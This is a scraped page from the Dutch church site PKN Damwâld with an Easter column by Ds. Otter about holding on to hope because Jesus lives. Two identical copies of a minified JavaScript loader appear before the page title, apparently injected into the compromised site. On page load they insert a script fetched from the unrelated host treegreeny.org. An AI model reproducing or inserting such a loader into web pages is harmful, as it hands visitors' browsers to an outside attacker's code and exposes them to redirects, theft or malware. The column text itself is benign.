;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Sta op ...'t is Pasen! - PKN Damwâld

Sta op …’t is Pasen!

Gepubliceerd op: woensdag 5 april 2023

Hoop verloren is al verloren, zo hoorde ik het als kind. Wanneer ik het niet zag zitten zei mijn moeder die woorden. Toch kan het een enorme worsteling zijn om de hoop vast te houden. Ziekte kan je ontmoedigen, financiële zorgen drukken misschien op je leven of relaties met andere mensen trekken je omlaag. Hoe houd je de hoop vast? Heeft het wel zin?

De reden om niet op te geven, is dat Jezus leeft. Hij zei: “Ik leef en u zult leven”. Met Pasen vieren we dat Jezus opstond uit de dood. Er is geen macht meer die het werk van Jezus kan stoppen. Het begin van het einde van de dood is van start gegaan. Dankzij Jezus.

Uit liefde voor ons gaf Hij Zijn leven aan het kruis. Het offer dat Hij bracht eindigde niet in het graf. Hij stond op en leeft. Omdat Hij leeft ben ik niet bang voor morgen.

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns